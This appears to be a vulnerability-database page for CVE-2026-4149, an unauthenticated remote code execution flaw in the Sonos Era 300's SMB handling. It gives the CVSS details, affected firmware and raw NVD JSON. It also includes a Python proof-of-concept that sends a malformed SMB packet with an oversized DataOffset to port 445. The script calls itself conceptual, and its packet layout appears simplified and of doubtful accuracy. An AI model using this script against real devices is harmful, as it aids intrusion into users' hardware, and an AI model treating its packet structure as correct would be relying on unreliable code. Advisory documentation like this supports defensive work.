Security Vulnerability Report
中文
CVE-2026-4149 CVSS 9.8 CRITICAL

CVE-2026-4149

Published: 2026-04-11 01:16:16
Last Modified: 2026-04-15 12:26:48
Source: [email protected]

Description

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel. Was ZDI-CAN-28345.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sonos:era_300_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sonos:era_300:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sonos Era 300 (具体受影响固件版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # Proof of Concept for CVE-2026-4149 # This script attempts to trigger the Out-Of-Bounds access by sending # a crafted SMB response with a malicious DataOffset field. # Note: This is a conceptual demonstration for educational purposes. def send_exploit(target_ip, target_port=445): print(f"[*] Targeting {target_ip}:{target_port}") try: # Establish connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Malicious SMB Header (Simplified) # The vulnerability lies in the DataOffset field handling smb_magic = b'\xffSMB' command = b'\x00' status = b'\x00\x00\x00\x00' flags = b'\x00\x00' flags2 = b'\x00\x00' pid_high = b'\x00\x00' security_features = b'\x00\x00\x00\x00' reserved = b'\x00\x00\x00\x00' tid = b'\x00\x00' pid_low = b'\x00\x00' uid = b'\x00\x00' mid = b'\x00\x00' # Constructing the packet # A valid DataOffset might be 0x40 (64), we set it to an invalid high value # to force an Out-Of-Bounds Read/Write. malformed_data_offset = struct.pack('<I', 0xFFFFFF00) header = smb_magic + command + status + flags + flags2 + pid_high header += security_features + reserved + tid + pid_low + uid + mid # In a real exploit, the offset points to a controlled memory region # Payload follows here payload = b'A' * 100 # Combine Header and Malformed Offset # The actual structure depends on the specific SMB command dialect used full_packet = header + malformed_data_offset + payload print("[*] Sending malformed SMB packet...") s.send(full_packet) print("[+] Packet sent. Check device status for crash or code execution.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP # send_exploit("192.168.1.100") pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4149", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:16.430", "lastModified": "2026-04-15T12:26:48.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel. Was ZDI-CAN-28345."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sonos:era_300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "83.1-61240", "matchCriteriaId": "B5F8E969-AF0B-4066-9757-9F820B55D025"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sonos:era_300:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FA3DF86-8D07-4044-88B9-04FD8B498D8B"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-192/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.